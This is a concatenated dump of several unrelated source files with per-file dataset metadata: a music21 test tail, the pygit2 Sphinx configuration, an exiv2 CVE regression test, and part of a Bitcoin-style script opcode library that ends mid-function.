p2Accent = nextAccent
#-------------------------------------------------------------------------------
class TestExternal(unittest.TestCase):
def runTest(self):
pass
def testSingle(self):
'''Need to test direct meter creation w/o stream
'''
from music21 import note, meter
s = stream.Stream()
ts = meter.TimeSignature('4/4')
s.append(ts)
n = note.Note()
n.quarterLength = 1
s.repeatAppend(n, 4)
n = note.Note()
n.quarterLength = .5
s.repeatAppend(n, 8)
s = s.makeMeasures()
s = labelBeatDepth(s)
s.show()
class Test(unittest.TestCase):
'''Unit tests
'''
def runTest(self):
pass
def setUp(self):
pass
def testDoNothing(self):
pass
#-------------------------------------------------------------------------------
# define presented order in documentation
_DOC_ORDER = [labelBeatDepth]
if __name__ == "__main__":
import music21
music21.mainTest(Test) #, TestExternal)
#------------------------------------------------------------------------------
# eof
| mit | 3,405,661,291,353,366,000 | 30.457944 | 100 | 0.559863 | false |
frutiger/pygit2 | docs/conf.py | 1 | 7971 | # -*- coding: utf-8 -*-
#
# pygit2 documentation build configuration file, created by
# sphinx-quickstart on Sun Jan 6 09:55:26 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os, platform
from string import digits
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
version_string = sys.platform.rstrip(digits) + "-" + os.uname()[4] + "-" + ".".join(platform.python_version_tuple()[0:2])
sys.path.insert(0, os.path.abspath('../build/lib.' + version_string))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pygit2'
copyright = u'2010-2014 The pygit2 contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.22'
# The full version, including alpha/beta/rc tags.
release = '0.22.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["_themes", ]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pygit2doc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'pygit2.tex', u'pygit2 Documentation',
u'J. David Ibáñez', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pygit2', u'pygit2 Documentation',
[u'J. David Ibáñez'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pygit2', u'pygit2 Documentation',
u'J. David Ibáñez', 'pygit2', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| gpl-2.0 | -3,619,021,428,859,344,400 | 31.643443 | 121 | 0.702825 | false |
AlienCowEatCake/ImageViewer | src/ThirdParty/Exiv2/exiv2-0.27.3-Source/tests/bugfixes/github/test_CVE_2018_11531.py | 3 | 1094 | # -*- coding: utf-8 -*-
from system_tests import CaseMeta, path, check_no_ASAN_UBSAN_errors
class TestCvePoC(metaclass=CaseMeta):
"""
Regression test for the bug described in:
https://github.com/Exiv2/exiv2/issues/283
"""
url = "https://github.com/Exiv2/exiv2/issues/283"
cve_url = "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11531"
def check_no_ASAN_UBSAN_errors(self, i, command, got_stderr, expected_stderr):
""" Override of system_tests.check_no_ASAN_UBSAN_errors for this particular test case.
Here we want to also check that the two last lines of got_stderr have the expected_stderr
"""
check_no_ASAN_UBSAN_errors(self, i, command, got_stderr, expected_stderr)
self.assertListEqual(expected_stderr.splitlines(), got_stderr.splitlines()[-2:])
filename = path("$data_path/pocIssue283.jpg")
commands = ["$exiv2 $filename"]
stdout = [""]
stderr = [
"""$exiv2_exception_message $filename:
$kerCorruptedMetadata
"""]
compare_stderr = check_no_ASAN_UBSAN_errors
retval = [1]
| gpl-3.0 | 534,201,225,946,510,660 | 34.290323 | 97 | 0.669104 | false |
litecoinz-project/litecoinz | qa/rpc-tests/test_framework/script.py | 2 | 23865 | #
# script.py
#
# This file is modified from python-bitcoinlib.
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
"""Scripts
Functionality to build scripts, as well as SignatureHash().
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from test_framework.mininode import CTransaction, CTxOut, hash256
import sys
bchr = chr
bord = ord
if sys.version > '3':
long = int
bchr = lambda x: bytes([x])
bord = lambda x: x
import struct
import binascii
from test_framework import bignum
MAX_SCRIPT_SIZE = 10000
MAX_SCRIPT_ELEMENT_SIZE = 520
MAX_SCRIPT_OPCODES = 201
OPCODE_NAMES = {}
_opcode_instances = []
class CScriptOp(int):
"""A single script opcode"""
__slots__ = []
@staticmethod
def encode_op_pushdata(d):
"""Encode a PUSHDATA op, returning bytes"""
if len(d) < 0x4c:
return b'' + bchr(len(d)) + d # OP_PUSHDATA
elif len(d) <= 0xff:
return b'\x4c' + bchr(len(d)) + d # OP_PUSHDATA1
elif len(d) <= 0xffff:
return b'\x4d' + struct.pack(b'<H', len(d)) + d # OP_PUSHDATA2
elif len(d) <= 0xffffffff:
return b'\x4e' + struct.pack(b'<I', len(d)) + d # OP_PUSHDATA4
else:
raise ValueError("Data too long to encode in a PUSHDATA op")
@staticmethod
def encode_op_n(n):
"""Encode a small integer op, returning an opcode"""
if not (0 <= n <= 16):
raise ValueError('Integer must be in range 0 <= n <= 16, got %d' % n)
if n == 0:
return OP_0
else:
return CScriptOp(OP_1 + n-1)
def decode_op_n(self):
"""Decode a small integer opcode, returning an integer"""
if self == OP_0:
return 0
if not (self == OP_0 or OP_1 <= self <= OP_16):
raise ValueError('op %r is not an OP_N' % self)
return int(self - OP_1+1)
def is_small_int(self):
"""Return true if the op pushes a small integer to the stack"""
if 0x51 <= self <= 0x60 or self == 0:
return True
else:
return False
def __str__(self):
return repr(self)
def __repr__(self):
if self in OPCODE_NAMES:
return OPCODE_NAMES[self]
else:
return 'CScriptOp(0x%x)' % self
def __new__(cls, n):
try:
return _opcode_instances[n]
except IndexError:
assert len(_opcode_instances) == n
_opcode_instances.append(super(CScriptOp, cls).__new__(cls, n))
return _opcode_instances[n]
# Populate opcode instance table
for n in range(0xff+1):
CScriptOp(n)
# push value
OP_0 = CScriptOp(0x00)
OP_FALSE = OP_0
OP_PUSHDATA1 = CScriptOp(0x4c)
OP_PUSHDATA2 = CScriptOp(0x4d)
OP_PUSHDATA4 = CScriptOp(0x4e)
OP_1NEGATE = CScriptOp(0x4f)
OP_RESERVED = CScriptOp(0x50)
OP_1 = CScriptOp(0x51)
OP_TRUE=OP_1
OP_2 = CScriptOp(0x52)
OP_3 = CScriptOp(0x53)
OP_4 = CScriptOp(0x54)
OP_5 = CScriptOp(0x55)
OP_6 = CScriptOp(0x56)
OP_7 = CScriptOp(0x57)
OP_8 = CScriptOp(0x58)
OP_9 = CScriptOp(0x59)
OP_10 = CScriptOp(0x5a)
OP_11 = CScriptOp(0x5b)
OP_12 = CScriptOp(0x5c)
OP_13 = CScriptOp(0x5d)
OP_14 = CScriptOp(0x5e)
OP_15 = CScriptOp(0x5f)
OP_16 = CScriptOp(0x60)
# control
OP_NOP = CScriptOp(0x61)
OP_VER = CScriptOp(0x62)
OP_IF = CScriptOp(0x63)
OP_NOTIF = CScriptOp(0x64)
OP_VERIF = CScriptOp(0x65)
OP_VERNOTIF = CScriptOp(0x66)
OP_ELSE = CScriptOp(0x67)
OP_ENDIF = CScriptOp(0x68)
OP_VERIFY = CScriptOp(0x69)
OP_RETURN = CScriptOp(0x6a)
# stack ops
OP_TOALTSTACK = CScriptOp(0x6b)
OP_FROMALTSTACK = CScriptOp(0x6c)
OP_2DROP = CScriptOp(0x6d)
OP_2DUP = CScriptOp(0x6e)
OP_3DUP = CScriptOp(0x6f)
OP_2OVER = CScriptOp(0x70)
OP_2ROT = CScriptOp(0x71)
OP_2SWAP = CScriptOp(0x72)
OP_IFDUP = CScriptOp(0x73)
OP_DEPTH = CScriptOp(0x74)
OP_DROP = CScriptOp(0x75)
OP_DUP = CScriptOp(0x76)
OP_NIP = CScriptOp(0x77)
OP_OVER = CScriptOp(0x78)
OP_PICK = CScriptOp(0x79)
OP_ROLL = CScriptOp(0x7a)
OP_ROT = CScriptOp(0x7b)
OP_SWAP = CScriptOp(0x7c)
OP_TUCK = CScriptOp(0x7d)
# splice ops
OP_CAT = CScriptOp(0x7e)
OP_SUBSTR = CScriptOp(0x7f)
OP_LEFT = CScriptOp(0x80)
OP_RIGHT = CScriptOp(0x81)
OP_SIZE = CScriptOp(0x82)
# bit logic
OP_INVERT = CScriptOp(0x83)
OP_AND = CScriptOp(0x84)
OP_OR = CScriptOp(0x85)
OP_XOR = CScriptOp(0x86)
OP_EQUAL = CScriptOp(0x87)
OP_EQUALVERIFY = CScriptOp(0x88)
OP_RESERVED1 = CScriptOp(0x89)
OP_RESERVED2 = CScriptOp(0x8a)
# numeric
OP_1ADD = CScriptOp(0x8b)
OP_1SUB = CScriptOp(0x8c)
OP_2MUL = CScriptOp(0x8d)
OP_2DIV = CScriptOp(0x8e)
OP_NEGATE = CScriptOp(0x8f)
OP_ABS = CScriptOp(0x90)
OP_NOT = CScriptOp(0x91)
OP_0NOTEQUAL = CScriptOp(0x92)
OP_ADD = CScriptOp(0x93)
OP_SUB = CScriptOp(0x94)
OP_MUL = CScriptOp(0x95)
OP_DIV = CScriptOp(0x96)
OP_MOD = CScriptOp(0x97)
OP_LSHIFT = CScriptOp(0x98)
OP_RSHIFT = CScriptOp(0x99)
OP_BOOLAND = CScriptOp(0x9a)
OP_BOOLOR = CScriptOp(0x9b)
OP_NUMEQUAL = CScriptOp(0x9c)
OP_NUMEQUALVERIFY = CScriptOp(0x9d)
OP_NUMNOTEQUAL = CScriptOp(0x9e)
OP_LESSTHAN = CScriptOp(0x9f)
OP_GREATERTHAN = CScriptOp(0xa0)
OP_LESSTHANOREQUAL = CScriptOp(0xa1)
OP_GREATERTHANOREQUAL = CScriptOp(0xa2)
OP_MIN = CScriptOp(0xa3)
OP_MAX = CScriptOp(0xa4)
OP_WITHIN = CScriptOp(0xa5)
# crypto
OP_RIPEMD160 = CScriptOp(0xa6)
OP_SHA1 = CScriptOp(0xa7)
OP_SHA256 = CScriptOp(0xa8)
OP_HASH160 = CScriptOp(0xa9)
OP_HASH256 = CScriptOp(0xaa)
OP_CODESEPARATOR = CScriptOp(0xab)
OP_CHECKSIG = CScriptOp(0xac)
OP_CHECKSIGVERIFY = CScriptOp(0xad)
OP_CHECKMULTISIG = CScriptOp(0xae)
OP_CHECKMULTISIGVERIFY = CScriptOp(0xaf)
# expansion
OP_NOP1 = CScriptOp(0xb0)
OP_NOP2 = CScriptOp(0xb1)
OP_NOP3 = CScriptOp(0xb2)
OP_NOP4 = CScriptOp(0xb3)
OP_NOP5 = CScriptOp(0xb4)
OP_NOP6 = CScriptOp(0xb5)
OP_NOP7 = CScriptOp(0xb6)
OP_NOP8 = CScriptOp(0xb7)
OP_NOP9 = CScriptOp(0xb8)
OP_NOP10 = CScriptOp(0xb9)
# template matching params
OP_SMALLINTEGER = CScriptOp(0xfa)
OP_PUBKEYS = CScriptOp(0xfb)
OP_PUBKEYHASH = CScriptOp(0xfd)
OP_PUBKEY = CScriptOp(0xfe)
OP_INVALIDOPCODE = CScriptOp(0xff)
VALID_OPCODES = {
OP_1NEGATE,
OP_RESERVED,
OP_1,
OP_2,
OP_3,
OP_4,
OP_5,
OP_6,
OP_7,
OP_8,
OP_9,
OP_10,
OP_11,
OP_12,
OP_13,
OP_14,
OP_15,
OP_16,
OP_NOP,
OP_VER,
OP_IF,
OP_NOTIF,
OP_VERIF,
OP_VERNOTIF,
OP_ELSE,
OP_ENDIF,
OP_VERIFY,
OP_RETURN,
OP_TOALTSTACK,
OP_FROMALTSTACK,
OP_2DROP,
OP_2DUP,
OP_3DUP,
OP_2OVER,
OP_2ROT,
OP_2SWAP,
OP_IFDUP,
OP_DEPTH,
OP_DROP,
OP_DUP,
OP_NIP,
OP_OVER,
OP_PICK,
OP_ROLL,
OP_ROT,
OP_SWAP,
OP_TUCK,
OP_CAT,
OP_SUBSTR,
OP_LEFT,
OP_RIGHT,
OP_SIZE,
OP_INVERT,
OP_AND,
OP_OR,
OP_XOR,
OP_EQUAL,
OP_EQUALVERIFY,
OP_RESERVED1,
OP_RESERVED2,
OP_1ADD,
OP_1SUB,
OP_2MUL,
OP_2DIV,
OP_NEGATE,
OP_ABS,
OP_NOT,
OP_0NOTEQUAL,
OP_ADD,
OP_SUB,
OP_MUL,
OP_DIV,
OP_MOD,
OP_LSHIFT,
OP_RSHIFT,
OP_BOOLAND,
OP_BOOLOR,
OP_NUMEQUAL,
OP_NUMEQUALVERIFY,
OP_NUMNOTEQUAL,
OP_LESSTHAN,
OP_GREATERTHAN,
OP_LESSTHANOREQUAL,
OP_GREATERTHANOREQUAL,
OP_MIN,
OP_MAX,
OP_WITHIN,
OP_RIPEMD160,
OP_SHA1,
OP_SHA256,
OP_HASH160,
OP_HASH256,
OP_CODESEPARATOR,
OP_CHECKSIG,
OP_CHECKSIGVERIFY,
OP_CHECKMULTISIG,
OP_CHECKMULTISIGVERIFY,
OP_NOP1,
OP_NOP2,
OP_NOP3,
OP_NOP4,
OP_NOP5,
OP_NOP6,
OP_NOP7,
OP_NOP8,
OP_NOP9,
OP_NOP10,
OP_SMALLINTEGER,
OP_PUBKEYS,
OP_PUBKEYHASH,
OP_PUBKEY,
}
OPCODE_NAMES.update({
OP_0 : 'OP_0',
OP_PUSHDATA1 : 'OP_PUSHDATA1',
OP_PUSHDATA2 : 'OP_PUSHDATA2',
OP_PUSHDATA4 : 'OP_PUSHDATA4',
OP_1NEGATE : 'OP_1NEGATE',
OP_RESERVED : 'OP_RESERVED',
OP_1 : 'OP_1',
OP_2 : 'OP_2',
OP_3 : 'OP_3',
OP_4 : 'OP_4',
OP_5 : 'OP_5',
OP_6 : 'OP_6',
OP_7 : 'OP_7',
OP_8 : 'OP_8',
OP_9 : 'OP_9',
OP_10 : 'OP_10',
OP_11 : 'OP_11',
OP_12 : 'OP_12',
OP_13 : 'OP_13',
OP_14 : 'OP_14',
OP_15 : 'OP_15',
OP_16 : 'OP_16',
OP_NOP : 'OP_NOP',
OP_VER : 'OP_VER',
OP_IF : 'OP_IF',
OP_NOTIF : 'OP_NOTIF',
OP_VERIF : 'OP_VERIF',
OP_VERNOTIF : 'OP_VERNOTIF',
OP_ELSE : 'OP_ELSE',
OP_ENDIF : 'OP_ENDIF',
OP_VERIFY : 'OP_VERIFY',
OP_RETURN : 'OP_RETURN',
OP_TOALTSTACK : 'OP_TOALTSTACK',
OP_FROMALTSTACK : 'OP_FROMALTSTACK',
OP_2DROP : 'OP_2DROP',
OP_2DUP : 'OP_2DUP',
OP_3DUP : 'OP_3DUP',
OP_2OVER : 'OP_2OVER',
OP_2ROT : 'OP_2ROT',
OP_2SWAP : 'OP_2SWAP',
OP_IFDUP : 'OP_IFDUP',
OP_DEPTH : 'OP_DEPTH',
OP_DROP : 'OP_DROP',
OP_DUP : 'OP_DUP',
OP_NIP : 'OP_NIP',
OP_OVER : 'OP_OVER',
OP_PICK : 'OP_PICK',
OP_ROLL : 'OP_ROLL',
OP_ROT : 'OP_ROT',
OP_SWAP : 'OP_SWAP',
OP_TUCK : 'OP_TUCK',
OP_CAT : 'OP_CAT',
OP_SUBSTR : 'OP_SUBSTR',
OP_LEFT : 'OP_LEFT',
OP_RIGHT : 'OP_RIGHT',
OP_SIZE : 'OP_SIZE',
OP_INVERT : 'OP_INVERT',
OP_AND : 'OP_AND',
OP_OR : 'OP_OR',
OP_XOR : 'OP_XOR',
OP_EQUAL : 'OP_EQUAL',
OP_EQUALVERIFY : 'OP_EQUALVERIFY',
OP_RESERVED1 : 'OP_RESERVED1',
OP_RESERVED2 : 'OP_RESERVED2',
OP_1ADD : 'OP_1ADD',
OP_1SUB : 'OP_1SUB',
OP_2MUL : 'OP_2MUL',
OP_2DIV : 'OP_2DIV',
OP_NEGATE : 'OP_NEGATE',
OP_ABS : 'OP_ABS',
OP_NOT : 'OP_NOT',
OP_0NOTEQUAL : 'OP_0NOTEQUAL',
OP_ADD : 'OP_ADD',
OP_SUB : 'OP_SUB',
OP_MUL : 'OP_MUL',
OP_DIV : 'OP_DIV',
OP_MOD : 'OP_MOD',
OP_LSHIFT : 'OP_LSHIFT',
OP_RSHIFT : 'OP_RSHIFT',
OP_BOOLAND : 'OP_BOOLAND',
OP_BOOLOR : 'OP_BOOLOR',
OP_NUMEQUAL : 'OP_NUMEQUAL',
OP_NUMEQUALVERIFY : 'OP_NUMEQUALVERIFY',
OP_NUMNOTEQUAL : 'OP_NUMNOTEQUAL',
OP_LESSTHAN : 'OP_LESSTHAN',
OP_GREATERTHAN : 'OP_GREATERTHAN',
OP_LESSTHANOREQUAL : 'OP_LESSTHANOREQUAL',
OP_GREATERTHANOREQUAL : 'OP_GREATERTHANOREQUAL',
OP_MIN : 'OP_MIN',
OP_MAX : 'OP_MAX',
OP_WITHIN : 'OP_WITHIN',
OP_RIPEMD160 : 'OP_RIPEMD160',
OP_SHA1 : 'OP_SHA1',
OP_SHA256 : 'OP_SHA256',
OP_HASH160 : 'OP_HASH160',
OP_HASH256 : 'OP_HASH256',
OP_CODESEPARATOR : 'OP_CODESEPARATOR',
OP_CHECKSIG : 'OP_CHECKSIG',
OP_CHECKSIGVERIFY : 'OP_CHECKSIGVERIFY',
OP_CHECKMULTISIG : 'OP_CHECKMULTISIG',
OP_CHECKMULTISIGVERIFY : 'OP_CHECKMULTISIGVERIFY',
OP_NOP1 : 'OP_NOP1',
OP_NOP2 : 'OP_NOP2',
OP_NOP3 : 'OP_NOP3',
OP_NOP4 : 'OP_NOP4',
OP_NOP5 : 'OP_NOP5',
OP_NOP6 : 'OP_NOP6',
OP_NOP7 : 'OP_NOP7',
OP_NOP8 : 'OP_NOP8',
OP_NOP9 : 'OP_NOP9',
OP_NOP10 : 'OP_NOP10',
OP_SMALLINTEGER : 'OP_SMALLINTEGER',
OP_PUBKEYS : 'OP_PUBKEYS',
OP_PUBKEYHASH : 'OP_PUBKEYHASH',
OP_PUBKEY : 'OP_PUBKEY',
OP_INVALIDOPCODE : 'OP_INVALIDOPCODE',
})
OPCODES_BY_NAME = {
'OP_0' : OP_0,
'OP_PUSHDATA1' : OP_PUSHDATA1,
'OP_PUSHDATA2' : OP_PUSHDATA2,
'OP_PUSHDATA4' : OP_PUSHDATA4,
'OP_1NEGATE' : OP_1NEGATE,
'OP_RESERVED' : OP_RESERVED,
'OP_1' : OP_1,
'OP_2' : OP_2,
'OP_3' : OP_3,
'OP_4' : OP_4,
'OP_5' : OP_5,
'OP_6' : OP_6,
'OP_7' : OP_7,
'OP_8' : OP_8,
'OP_9' : OP_9,
'OP_10' : OP_10,
'OP_11' : OP_11,
'OP_12' : OP_12,
'OP_13' : OP_13,
'OP_14' : OP_14,
'OP_15' : OP_15,
'OP_16' : OP_16,
'OP_NOP' : OP_NOP,
'OP_VER' : OP_VER,
'OP_IF' : OP_IF,
'OP_NOTIF' : OP_NOTIF,
'OP_VERIF' : OP_VERIF,
'OP_VERNOTIF' : OP_VERNOTIF,
'OP_ELSE' : OP_ELSE,
'OP_ENDIF' : OP_ENDIF,
'OP_VERIFY' : OP_VERIFY,
'OP_RETURN' : OP_RETURN,
'OP_TOALTSTACK' : OP_TOALTSTACK,
'OP_FROMALTSTACK' : OP_FROMALTSTACK,
'OP_2DROP' : OP_2DROP,
'OP_2DUP' : OP_2DUP,
'OP_3DUP' : OP_3DUP,
'OP_2OVER' : OP_2OVER,
'OP_2ROT' : OP_2ROT,
'OP_2SWAP' : OP_2SWAP,
'OP_IFDUP' : OP_IFDUP,
'OP_DEPTH' : OP_DEPTH,
'OP_DROP' : OP_DROP,
'OP_DUP' : OP_DUP,
'OP_NIP' : OP_NIP,
'OP_OVER' : OP_OVER,
'OP_PICK' : OP_PICK,
'OP_ROLL' : OP_ROLL,
'OP_ROT' : OP_ROT,
'OP_SWAP' : OP_SWAP,
'OP_TUCK' : OP_TUCK,
'OP_CAT' : OP_CAT,
'OP_SUBSTR' : OP_SUBSTR,
'OP_LEFT' : OP_LEFT,
'OP_RIGHT' : OP_RIGHT,
'OP_SIZE' : OP_SIZE,
'OP_INVERT' : OP_INVERT,
'OP_AND' : OP_AND,
'OP_OR' : OP_OR,
'OP_XOR' : OP_XOR,
'OP_EQUAL' : OP_EQUAL,
'OP_EQUALVERIFY' : OP_EQUALVERIFY,
'OP_RESERVED1' : OP_RESERVED1,
'OP_RESERVED2' : OP_RESERVED2,
'OP_1ADD' : OP_1ADD,
'OP_1SUB' : OP_1SUB,
'OP_2MUL' : OP_2MUL,
'OP_2DIV' : OP_2DIV,
'OP_NEGATE' : OP_NEGATE,
'OP_ABS' : OP_ABS,
'OP_NOT' : OP_NOT,
'OP_0NOTEQUAL' : OP_0NOTEQUAL,
'OP_ADD' : OP_ADD,
'OP_SUB' : OP_SUB,
'OP_MUL' : OP_MUL,
'OP_DIV' : OP_DIV,
'OP_MOD' : OP_MOD,
'OP_LSHIFT' : OP_LSHIFT,
'OP_RSHIFT' : OP_RSHIFT,
'OP_BOOLAND' : OP_BOOLAND,
'OP_BOOLOR' : OP_BOOLOR,
'OP_NUMEQUAL' : OP_NUMEQUAL,
'OP_NUMEQUALVERIFY' : OP_NUMEQUALVERIFY,
'OP_NUMNOTEQUAL' : OP_NUMNOTEQUAL,
'OP_LESSTHAN' : OP_LESSTHAN,
'OP_GREATERTHAN' : OP_GREATERTHAN,
'OP_LESSTHANOREQUAL' : OP_LESSTHANOREQUAL,
'OP_GREATERTHANOREQUAL' : OP_GREATERTHANOREQUAL,
'OP_MIN' : OP_MIN,
'OP_MAX' : OP_MAX,
'OP_WITHIN' : OP_WITHIN,
'OP_RIPEMD160' : OP_RIPEMD160,
'OP_SHA1' : OP_SHA1,
'OP_SHA256' : OP_SHA256,
'OP_HASH160' : OP_HASH160,
'OP_HASH256' : OP_HASH256,
'OP_CODESEPARATOR' : OP_CODESEPARATOR,
'OP_CHECKSIG' : OP_CHECKSIG,
'OP_CHECKSIGVERIFY' : OP_CHECKSIGVERIFY,
'OP_CHECKMULTISIG' : OP_CHECKMULTISIG,
'OP_CHECKMULTISIGVERIFY' : OP_CHECKMULTISIGVERIFY,
'OP_NOP1' : OP_NOP1,
'OP_NOP2' : OP_NOP2,
'OP_NOP3' : OP_NOP3,
'OP_NOP4' : OP_NOP4,
'OP_NOP5' : OP_NOP5,
'OP_NOP6' : OP_NOP6,
'OP_NOP7' : OP_NOP7,
'OP_NOP8' : OP_NOP8,
'OP_NOP9' : OP_NOP9,
'OP_NOP10' : OP_NOP10,
'OP_SMALLINTEGER' : OP_SMALLINTEGER,
'OP_PUBKEYS' : OP_PUBKEYS,
'OP_PUBKEYHASH' : OP_PUBKEYHASH,
'OP_PUBKEY' : OP_PUBKEY,
}
class CScriptInvalidError(Exception):
"""Base class for CScript exceptions"""
pass
class CScriptTruncatedPushDataError(CScriptInvalidError):
"""Invalid pushdata due to truncation"""
def __init__(self, msg, data):
self.data = data
super(CScriptTruncatedPushDataError, self).__init__(msg)
# This is used, eg, for blockchain heights in coinbase scripts (bip34)
class CScriptNum(object):
def __init__(self, d=0):
self.value = d
@staticmethod
def encode(obj):
r = bytearray(0)
if obj.value == 0:
return bytes(r)
neg = obj.value < 0
absvalue = -obj.value if neg else obj.value
while (absvalue):
r.append(chr(absvalue & 0xff))
absvalue >>= 8
if r[-1] & 0x80:
r.append(0x80 if neg else 0)
elif neg:
r[-1] |= 0x80
return bytes(bchr(len(r)) + r)
class CScript(bytes):
"""Serialized script
A bytes subclass, so you can use this directly whenever bytes are accepted.
Note that this means that indexing does *not* work - you'll get an index by
byte rather than opcode. This format was chosen for efficiency so that the
general case would not require creating a lot of little CScriptOP objects.
iter(script) however does iterate by opcode.
"""
@classmethod
def __coerce_instance(cls, other):
# Coerce other into bytes
if isinstance(other, CScriptOp):
other = bchr(other)
elif isinstance(other, CScriptNum):
if (other.value == 0):
other = bchr(CScriptOp(OP_0))
else:
other = CScriptNum.encode(other)
elif isinstance(other, (int, long)):
if 0 <= other <= 16:
other = bytes(bchr(CScriptOp.encode_op_n(other)))
elif other == -1:
other = bytes(bchr(OP_1NEGATE))
else:
other = CScriptOp.encode_op_pushdata(bignum.bn2vch(other))
elif isinstance(other, (bytes, bytearray)):
other = bytes(CScriptOp.encode_op_pushdata(other))
return other
def __add__(self, other):
# Do the coercion outside of the try block so that errors in it are
# noticed.
other = self.__coerce_instance(other)
try:
# bytes.__add__ always returns bytes instances unfortunately
return CScript(super(CScript, self).__add__(other))
except TypeError:
raise TypeError('Can not add a %r instance to a CScript' % other.__class__)
def join(self, iterable):
# join makes no sense for a CScript()
raise NotImplementedError
def __new__(cls, value=b''):
if isinstance(value, bytes) or isinstance(value, bytearray):
return super(CScript, cls).__new__(cls, value)
else:
def coerce_iterable(iterable):
for instance in iterable:
yield cls.__coerce_instance(instance)
# Annoyingly on both python2 and python3 bytes.join() always
# returns a bytes instance even when subclassed.
return super(CScript, cls).__new__(cls, b''.join(coerce_iterable(value)))
def raw_iter(self):
"""Raw iteration
Yields tuples of (opcode, data, sop_idx) so that the different possible
PUSHDATA encodings can be accurately distinguished, as well as
determining the exact opcode byte indexes. (sop_idx)
"""
i = 0
while i < len(self):
sop_idx = i
opcode = bord(self[i])
i += 1
if opcode > OP_PUSHDATA4:
yield (opcode, None, sop_idx)
else:
datasize = None
pushdata_type = None
if opcode < OP_PUSHDATA1:
pushdata_type = 'PUSHDATA(%d)' % opcode
datasize = opcode
elif opcode == OP_PUSHDATA1:
pushdata_type = 'PUSHDATA1'
if i >= len(self):
